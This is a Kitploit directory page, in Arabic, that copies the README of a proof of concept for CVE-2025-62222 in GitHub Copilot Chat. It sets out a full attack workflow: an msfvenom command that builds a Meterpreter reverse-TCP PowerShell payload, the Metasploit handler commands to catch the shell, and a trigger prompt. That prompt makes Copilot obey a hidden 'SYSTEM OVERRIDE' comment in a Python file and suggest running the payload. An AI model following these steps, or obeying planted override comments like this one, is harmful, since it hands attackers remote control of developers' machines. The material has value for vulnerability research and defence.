Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2025-62222 — إثبات مفهوم يوضح تنفيذ الأوامر عن بُعد عبر حقن الأوامر في دردشة GitHub Copilot، باستخدام ملف Python مُصمم خصيصًا لتفعيل قشرة عكسية من نوع Meterpreter. | Kitploit
أدوات/GitHubGitHub/sadisticnight/poc-cve-2025-62222
أطر الاستغلالتوليد الحمولةشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
تطوير الحمولات
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

إثبات مفهوم يوضح تنفيذ الأوامر عن بُعد عبر حقن الأوامر في دردشة GitHub Copilot، باستخدام ملف Python مُصمم خصيصًا لتفعيل قشرة عكسية من نوع Meterpreter.

عرض المستودع
15منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

يحتوي هذا المستودع على إثبات مفهوم (PoC) للثغرة الأمنية CVE-2025-62222. يوضح كيف يمكن تحقيق تنفيذ الأوامر عن بُعد (RCE) على جهاز المطور عن طريق التلاعب بسياق GitHub Copilot Chat في VS Code من خلال حقن تعليمات برمجية مخفية في التعليقات.

⚠️ إخلاء مسؤولية ⚠️

لأغراض تعليمية فقط.
يتم توفير هذا الكود لأغراض تعليمية وبحثية أخلاقية فقط. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه المعلومات. لا تستخدم هذا في أنظمة دون إذن صريح.

المرحلة 1: إعداد المهاجم

قبل إرسال الملف إلى الضحية (أو اختباره محليًا)، يجب عليك إنشاء الحمولة وترك الخادم في حالة استماع.

1. إنشاء الحمولة (msfvenom)

قم بإنشاء الأمر الضار لـ PowerShell. تأكد من ضبط عنوان IP الخاص بك (LHOST) والمنفذ (LPORT).

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

تعليمات حاسمة: انسخ الكود الناتج عن هذا الأمر. افتح ملف copilot_injection_poc.py من هذا المستودع واستبدل القسم الذي يحتوي على TOKEN (أو السطر الكامل لأمر PowerShell داخل التعليق) بالكود الذي قمت بإنشائه للتو.

2. بدء المستمع (msfconsole)

في محطة المهاجم الخاصة بك، ابدأ Metasploit لاستقبال الاتصال العكسي:

root@kitploit:~
msfconsole -q

بمجرد الدخول إلى وحدة التحكم msf6 >، نفذ الأوامر التالية لتجهيز الاستماع:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(تأكد من أن LPORT هو نفسه الذي استخدمته في الخطوة 1 وأن LHOST هو عنوان IP الخاص بك).

المرحلة 2: إعادة إنتاج الثغرة (الضحية)

لتفعيل الثغرة، اتبع هذه الخطوات على الجهاز المثبت عليه VS Code وإضافة GitHub Copilot Chat:

  1. الاستنساخ/التنزيل: قم بتنزيل هذا المستودع على جهاز الضحية.
  2. الفتح في VS Code: افتح مجلد المشروع باستخدام VSCode.
  3. تحميل السياق: افتح ملف copilot_injection_poc.py في المحرر ليكون Copilot على دراية بسياقه النشط (يجب أن يكون مرئيًا في علامة التبويب).
  4. المشغل: افتح دردشة Copilot واكتب بالضبط الأمر التالي:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

النتيجة المتوقعة

بسبب التعليمات "SYSTEM OVERRIDE" المخفية في تعليقات سكربت Python، سيطيع Copilot الملف الضار بدلاً من إرشادات الأمان الخاصة به.

  1. سيرد Copilot بما يشبه "تنبيه النظام" وسيقترح تنفيذ أمر PowerShell المشفر.
  2. إذا قام المستخدم بنسخ وتنفيذ هذا الأمر في محطته الطرفية، فسيتم فتح جلسة Meterpreter على جهاز المهاجم، مما يمنحه تحكمًا عن بُعد في الجهاز.

لمزيد من المعلومات:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
تنزيل الأداة